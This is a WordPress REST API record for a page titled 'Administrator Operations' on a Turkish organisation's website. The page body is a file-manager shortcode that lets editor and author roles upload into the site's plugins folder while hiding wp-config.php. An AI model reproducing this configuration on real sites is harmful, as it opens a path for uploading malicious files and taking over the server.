{"id":6074,"date":"2025-02-27T07:42:11","date_gmt":"2025-02-27T07:42:11","guid":{"rendered":"https:\/\/www.burdurtb.org.tr\/tr\/?page_id=6074"},"modified":"2025-02-27T07:42:11","modified_gmt":"2025-02-27T07:42:11","slug":"yonetici-islemleri","status":"publish","type":"page","link":"https:\/\/www.burdurtb.org.tr\/tr\/yonetici-islemleri\/","title":{"rendered":"Y\u00f6netici \u0130\u015flemleri"},"content":{"rendered":"<p>[wp_file_manager view=&#8221;list&#8221; lang=&#8221;tr&#8221; theme=&#8221;light&#8221; dateformat=&#8221;d M, Y h:i A&#8221; allowed_roles=&#8221;editor,author&#8221; access_folder=&#8221;wp-content\/plugins&#8221; write = &#8220;true&#8221; read = &#8220;false&#8221; hide_files = &#8220;wp-content\/plugins,wp-config.php&#8221; lock_extensions=&#8221;.php,.css&#8221; allowed_operations=&#8221;upload,download&#8221; ban_user_ids=&#8221;99&#8243;]<\/p>\n<section id=\"bt_section69f85175ad713\"  class=\"boldSection gutter \" ><div class=\"port\"><div class=\"boldCell\"><div class=\"boldCellInner\"><\/div><\/div><\/div><\/section>\n","protected":false},"excerpt":{"rendered":"<p>[wp_file_manager view=&#8221;list&#8221; lang=&#8221;tr&#8221; theme=&#8221;light&#8221; dateformat=&#8221;d M, Y h:i A&#8221; allowed_roles=&#8221;editor,author&#8221; access_folder=&#8221;wp-content\/plugins&#8221; write = &#8220;true&#8221; read = &#8220;false&#8221; hide_files = &#8220;wp-content\/plugins,wp-config.php&#8221; lock_extensions=&#8221;.php,.css&#8221; allowed_operations=&#8221;upload,download&#8221; ban_user_ids=&#8221;99&#8243;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-6074","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.burdurtb.org.tr\/tr\/wp-json\/wp\/v2\/pages\/6074","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.burdurtb.org.tr\/tr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.burdurtb.org.tr\/tr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.burdurtb.org.tr\/tr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.burdurtb.org.tr\/tr\/wp-json\/wp\/v2\/comments?post=6074"}],"version-history":[{"count":1,"href":"https:\/\/www.burdurtb.org.tr\/tr\/wp-json\/wp\/v2\/pages\/6074\/revisions"}],"predecessor-version":[{"id":6076,"href":"https:\/\/www.burdurtb.org.tr\/tr\/wp-json\/wp\/v2\/pages\/6074\/revisions\/6076"}],"wp:attachment":[{"href":"https:\/\/www.burdurtb.org.tr\/tr\/wp-json\/wp\/v2\/media?parent=6074"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}